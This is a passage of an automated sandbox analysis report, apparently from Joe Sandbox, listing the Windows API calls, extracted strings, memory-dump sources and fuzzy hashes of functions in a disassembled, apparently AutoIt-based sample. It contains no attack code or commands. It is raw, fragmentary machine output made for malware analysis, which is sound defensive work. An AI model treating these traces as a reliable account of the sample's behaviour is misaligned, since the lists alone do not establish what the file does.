                                                                                                                                                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00F2F37A
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D7DE: ClientToScreen.USER32(?,?), ref: 00F2D807
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D7DE: GetWindowRect.USER32(?,?), ref: 00F2D87D
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D7DE: PtInRect.USER32(?,?,00F2ED5A), ref: 00F2D88D
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00F2F3E3
                                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F2F3EE
                                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F2F411
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F2F441
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F2F458
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00F2F471
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00F2F488
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00F2F4AA
                                                                                                                                                                                                                                                      • DragFinish.SHELL32(?), ref: 00F2F4B1
                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F2F59C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                      • API String ID: 169749273-3440237614
                                                                                                                                                                                                                                                      • Opcode ID: ec28ed3a8d6f112a23c42b73d485fd05d477b84ff6dc44e4fdea2f2787a4c58d
                                                                                                                                                                                                                                                      • Instruction ID: 6f392a8bbcd386ec2050694eb422b4dedfb6777737fa464de2f1668848c205b4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec28ed3a8d6f112a23c42b73d485fd05d477b84ff6dc44e4fdea2f2787a4c58d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D615B71108304AFC301EF64DC45EABBBF8FF99710F104A2EF595A21A1DB719A0ADB52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00F0AB3D
                                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00F0AB46
                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00F0AB52
                                                                                                                                                                                                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00F0AC40
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0AC70
                                                                                                                                                                                                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00F0AC9C
                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00F0AD4D
                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000016), ref: 00F0ADDF
                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00F0AE35
                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00F0AE44
                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00F0AE80
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                                                                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                                                                                                      • API String ID: 3730832054-3931177956
                                                                                                                                                                                                                                                      • Opcode ID: 7383dfe6fc08c1d0e259d36d4b4fc162c9306f186d0f3b2ae06f0f6ad2f1e3e1
                                                                                                                                                                                                                                                      • Instruction ID: 2c4a8dfd91e1650c9e7f8804d0aff01cd3c89b71746b39abb644afbf84ae2e3e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7383dfe6fc08c1d0e259d36d4b4fc162c9306f186d0f3b2ae06f0f6ad2f1e3e1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AD1CEB2A04205DBDB20DF65C885B6AB7F5FF45710F148056E405AB2D1DB78EC41FBA2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00F271FC
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F27247
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                                                                                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                      • API String ID: 3974292440-4258414348
                                                                                                                                                                                                                                                      • Opcode ID: da0d0690b1f32b2c2fba933018258a188363dbcfe6b1e4b2fb428215ca23ccaa
                                                                                                                                                                                                                                                      • Instruction ID: 40ac2b749621d346822e8b3c06ee703e808edf6a9a480bda63db17cedf51fa42
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da0d0690b1f32b2c2fba933018258a188363dbcfe6b1e4b2fb428215ca23ccaa
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F914B302087559BCA04FF24D951A6EB7E1BF94310F10585DF9966B3A3DB31ED0AEB82
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F2E5AB
                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00F29808,?), ref: 00F2E607
                                                                                                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F2E647
                                                                                                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F2E68C
                                                                                                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F2E6C3
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,00000004,?,?,?,00F29808,?), ref: 00F2E6CF
                                                                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F2E6DF
                                                                                                                                                                                                                                                      • DestroyIcon.USER32(?), ref: 00F2E6EE
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F2E70B
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F2E717
                                                                                                                                                                                                                                                        • Part of subcall function 00EE0FA7: __wcsicmp_l.LIBCMT ref: 00EE1030
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                                                                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                      • API String ID: 1212759294-1154884017
                                                                                                                                                                                                                                                      • Opcode ID: 83b1e1f1a6eae838a1e4abf62c860ca843cfa6c71244b6588ec7986dd902d2cc
                                                                                                                                                                                                                                                      • Instruction ID: 447a24db65fae4697c08e89ce6e20990ade7301a9141b2f85135ce14d5519d9d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83b1e1f1a6eae838a1e4abf62c860ca843cfa6c71244b6588ec7986dd902d2cc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A061F371950229FAEB14DF64DC46FFE7BA8BB18720F204115F915E61D1EBB0E980EB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
                                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00F0D292
                                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32 ref: 00F0D2DF
                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F0D327
                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F0D35E
                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F0D38C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                                                                                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                      • API String ID: 1148790751-4113822522
                                                                                                                                                                                                                                                      • Opcode ID: 822231a65e0a667268bf694923385b2c509bb61b7c2f8e935696902e32737413
                                                                                                                                                                                                                                                      • Instruction ID: f686b3d5d9ab6eefe0550d7aa4977ce728fe85bfc200768f23ef43eaedc0acc3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 822231a65e0a667268bf694923385b2c509bb61b7c2f8e935696902e32737413
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0514A75504305AFC700EF14C982E6EB7E4EF98718F10986DF89967291DB31EE06EB42
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00F33973,00000016,0000138C,00000016,?,00000016,00F5DDB4,00000000,?), ref: 00F026F1
                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00F33973,00000016), ref: 00F026FA
                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00F33973,00000016,0000138C,00000016,?,00000016,00F5DDB4,00000000,?,00000016), ref: 00F0271C
                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00F33973,00000016), ref: 00F0271F
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0276F
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F02780
                                                                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 00F02829
                                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F02840
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                      • API String ID: 618562835-2268648507
                                                                                                                                                                                                                                                      • Opcode ID: 5b817a2cc771bb4d919ecf3618ce804271351a5e3d1c459fe01a95f534cf77a0
                                                                                                                                                                                                                                                      • Instruction ID: 0f6f7c22f00105c83fb60c0b51fd76ee5d2a2dd78ea7128c641bf69b82c0b9c8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b817a2cc771bb4d919ecf3618ce804271351a5e3d1c459fe01a95f534cf77a0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E41577280061CBACB14FBD0DE86EEEB7B8AF15340F145069F50572092DE756F4AEB61
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F0D0D8
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0D0FA
                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F0D137
                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F0D15C
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F0D17B
                                                                                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 00F0D1B7
                                                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F0D1EC
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F0D1F7
                                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00F0D200
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F0D20A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                      • API String ID: 2733774712-3457252023
                                                                                                                                                                                                                                                      • Opcode ID: 224593826f7dc41e980f73b0ac203ceba8d86cc5c3685d80770c18625beb2d1b
                                                                                                                                                                                                                                                      • Instruction ID: e72e5a4f6e45a8b71b3920cd3527570e75f2f0f00fbdee40210608af9c05a844
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 224593826f7dc41e980f73b0ac203ceba8d86cc5c3685d80770c18625beb2d1b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8631A5B6900109ABDB21DFA1DC49FEB77BCEF89740F1040B6F909D21A1EB709744AB25
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 884005220-0
                                                                                                                                                                                                                                                      • Opcode ID: 6e83817fa596cbc45d3b903549d8878da3431a169466542dc8347f9f870a018b
                                                                                                                                                                                                                                                      • Instruction ID: 25ba1b7deea4a79ddac2b425f5d8ef4aeef40005a027674a7ebbfeed4229cf26
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e83817fa596cbc45d3b903549d8878da3431a169466542dc8347f9f870a018b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B061113290064EAFDB25AF25DE427B977E4EF503B8FA02126EA44BB181DF74CD408791
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00F2E754
                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00F2E76B
                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00F2E776
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F2E783
                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00F2E78C
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00F2E79B
                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00F2E7A4
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F2E7AB
                                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00F2E7BC
                                                                                                                                                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F4D9BC,?), ref: 00F2E7D5
                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00F2E7E5
                                                                                                                                                                                                                                                      • GetObjectW.GDI32(?,00000018,000000FF), ref: 00F2E809
                                                                                                                                                                                                                                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00F2E834
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00F2E85C
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F2E872
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3840717409-0
                                                                                                                                                                                                                                                      • Opcode ID: fb9a26ea11eed1f69eeddcafd7acda987417dea511cb46a65aade70952d15c71
                                                                                                                                                                                                                                                      • Instruction ID: 9ab3cdf0939b54f371a733cd47de4d499d0fadfda39312ddb12e3fed7a5d75f7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb9a26ea11eed1f69eeddcafd7acda987417dea511cb46a65aade70952d15c71
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90413A79A00218EFDB119F65DC48EAA7BB8EF9AB21F204058FD15D7260D7719D41EB20
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00F1076F
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F10787
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F10799
                                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F107AE
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F107C2
                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00F107DA
                                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00F107F4
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F10806
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                                                                                                                                      • String ID: *.*
